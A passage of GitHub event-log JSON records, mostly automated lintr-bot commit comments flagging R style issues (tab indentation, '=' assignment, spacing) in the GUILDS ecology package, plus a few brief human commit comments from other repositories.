0;\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xL = f(1e-10);\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   }\n^~\n```\n[R/drawLocal.R:19:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L19) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xL = f(1e-10);\n    ^~~~~~~~~~~~~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xR = f(xmax);\n^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:20:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L20) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xR = f(xmax);\n    ^~~~~~~~~~~~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n^~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L21) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n^~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                             ^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                            ~^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 = (xmax+1)/2;\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:20:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tx1 = (xmax+1)/2;\n                   ^\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:8:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:26:22:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L26) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n                     ^\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:28:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n                           ^\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:28:9:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n        ^~~~~~~~~\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                           ^\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/drawLocal.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                          ~^~\n```\n"}},"created_at":"2016-09-22T08:48:27Z"}
{"id":"4601149192","type":"CommitCommentEvent","actor":{"login":"amol26"},"repo":{"name":"amol26/test"},"payload":{"comment":{"id":19126719,"position":null,"line":null,"path":null,"commit_id":"4b909a82bae2cdf1ad468f477bb992ae9afb9294","created_at":"2016-09-22T08:49:11Z","updated_at":"2016-09-22T08:49:11Z","body":"I am Amol"}},"created_at":"2016-09-22T08:49:11Z"}
{"id":"4601149614","type":"CommitCommentEvent","actor":{"login":"rdeioris"},"repo":{"name":"20tab/UnrealEnginePython"},"payload":{"comment":{"id":19126720,"position":23,"line":502,"path":"Source/UnrealEnginePython/Private/UEPyEngine.cpp","commit_id":"f94fada520a98320eefbe59be24f5367ec81888c","created_at":"2016-09-22T08:49:17Z","updated_at":"2016-09-22T08:49:17Z","body":"The unreal delegate system automatically call the ProcessEvent() method of the passed object. This ProcessEvent() should then call the function, but in our case it is a fake one, instead ProcessEvent() calls the python function"}},"created_at":"2016-09-22T08:49:17Z"}
{"id":"4601152919","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19126733,"position":null,"line":null,"path":null,"commit_id":"b6a0985ed61104952dcc45823a75656fc6ab017e","created_at":"2016-09-22T08:50:02Z","updated_at":"2016-09-22T08:50:02Z","body":"Initial commit."}},"created_at":"2016-09-22T08:50:02Z"}
{"id":"4601153842","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19126735,"position":94,"line":131,"path":"src/util/rocksdb.rs","commit_id":"18ba1a9155b7e6b2f1bb3ba5d79822b08868b80c","created_at":"2016-09-22T08:50:14Z","updated_at":"2016-09-22T08:50:14Z","body":"should add a comment about why using `CURRENT`"}},"created_at":"2016-09-22T08:50:14Z"}
{"id":"4601155543","type":"CommitCommentEvent","actor":{"login":"ohinckel"},"repo":{"name":"smarthomeNG/smarthome"},"payload":{"comment":{"id":19126737,"position":null,"line":null,"path":null,"commit_id":"c3e223c1c64bb68ee39a76f54d3209357fbd76b3","created_at":"2016-09-22T08:50:37Z","updated_at":"2016-09-22T08:50:37Z","body":"Yes, it's about the capital. And this was really no problem, so don't worry. I just want to point to this typo - and of course we all produce typos in the pressure of time.\r\n"}},"created_at":"2016-09-22T08:50:37Z"}
{"id":"4601156496","type":"CommitCommentEvent","actor":{"login":"MickeyHub"},"repo":{"name":"robertvojta/LigatureXcodePlugin"},"payload":{"comment":{"id":19126739,"position":null,"line":null,"path":null,"commit_id":"d3ddf94400f212b39bf28770c4f0a2bd058267ef","created_at":"2016-09-22T08:50:49Z","updated_at":"2016-09-22T08:50:49Z","body":"👍"}},"created_at":"2016-09-22T08:50:49Z"}
{"id":"4601156511","type":"CommitCommentEvent","actor":{"login":"webaddkevin"},"repo":{"name":"webaddkevin/ShortCutPhotoZoomPro"},"payload":{"comment":{"id":19126740,"position":null,"line":null,"path":null,"commit_id":"2fb6d3d04faceea7bee4d4cdc326e06d6bb8aa73","created_at":"2016-09-22T08:50:49Z","updated_at":"2016-09-22T08:50:49Z","body":"new"}},"created_at":"2016-09-22T08:50:49Z"}
{"id":"4601160197","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19126750,"position":null,"line":null,"path":null,"commit_id":"1ec370307bbc9cb8832e3dfb437bb96942f7c57e","created_at":"2016-09-22T08:51:37Z","updated_at":"2016-09-22T08:51:37Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/calcSumKDA2.R:4:20:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L4) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  results <- matrix( 0, nrow = s, ncol = 1)\n                   ^\n```\n[R/calcSumKDA2.R:7:28:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​    outcomes <- KDA[numbers+1] + (log(I[i]) * numbers)  -\n                          ~^~\n```\n[R/calcSumKDA2.R:8:7:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n      ^\n```\n[R/calcSumKDA2.R:8:15:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n              ^\n```\n[R/calcSumKDA2.R:8:32:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                               ^\n```\n[R/calcSumKDA2.R:8:50:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                 ^\n```\n[R/calcSumKDA2.R:8:52:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                   ^\n```\n[R/calcSumKDA2.R:10:19:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                  ^\n```\n[R/calcSumKDA2.R:10:29:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                            ^\n```\n[R/calcSumKDA2.R:11:19:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                  ^\n```\n[R/calcSumKDA2.R:11:44:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                                           ^\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:5:27:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:6:27:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:14:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    b[cnt] = lgamma(I_X[cnt] + I_Y[cnt] + J) - lgamma(I_X[cnt] + I_Y[cnt])\n           ^\n```\n[R/Condition.R:15:17:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt])\n                ^\n```\n[R/Condition.R:16:17:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt])\n                ^\n```\n[R/Condition.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:21:36:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                  ~^~\n```\n[R/Condition.R:21:51:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                                 ~^~\n```\n[R/Condition.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n               ^\n```\n[R/Condition.R:23:47:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                              ^\n```\n[R/Condition.R:23:51:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                                  ^\n```\n[R/Condition.R:24:53:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L24) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (lgamma(theta_x / 2) + lgamma(theta_y / 2) )\n                                                    ^\n```\n[R/Condition.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n         ^\n```\n[R/Condition.R:25:42:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/Condition.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:33:3:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L33) *style:* **Variable and function names should be all lowercase.**\n```r\n​  incorrectLength <- 0\n  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:34:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:34:39:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:35:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:35:39:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L35) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:37:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(incorrectLength == 1) { \n    ^\n```\n[R/Condition.R:37:6:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(incorrectLength == 1) { \n     ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:37:28:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L37) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(incorrectLength == 1) { \n                           ^\n```\n[R/Condition.R:37:29:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(incorrectLength == 1) { \n                            ^\n```\n[R/Condition.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tx <- subplex(initVals, g)\n^\n```\n[R/Condition.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:47:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:51:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:55:18:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:55:19:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:56:13:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:56:14:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             